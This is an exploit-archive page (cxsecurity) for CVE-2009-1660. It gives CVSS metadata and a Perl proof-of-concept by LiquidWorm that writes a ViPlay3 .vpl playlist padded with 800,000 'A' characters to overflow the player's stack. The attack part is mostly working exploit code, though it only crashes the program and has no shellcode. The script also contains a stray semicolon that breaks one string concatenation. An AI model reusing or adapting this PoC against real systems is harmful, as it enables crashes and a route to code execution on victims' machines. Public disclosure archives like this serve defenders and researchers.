ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

2009-05-18 / 2009-05-19
Credit: liquidworm
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1660
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#/usr/bin/perl # # ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC # # Product web page: http://www.urusoft.net/ # Tested on Microsoft Windows XP Professional SP3 (English) # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # http://www.zeroscience.org/ # 08.05.2009 $b= "[General]\r\n". "Title=Proof of Concept\r\n". "Author=LiquidWorm\r\n". "Comments=2009\r\n". "Version=1.0\r\n". "[Files]\r\n"; "Count=800000\r\n". "LastPlayed=0\r\n"; $c= "1=" . "A" x 800000 . "\r\n"; open a, ">./lqwrm.vpl"; print a $b.$c; close a; print "\n- Done!\n";


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top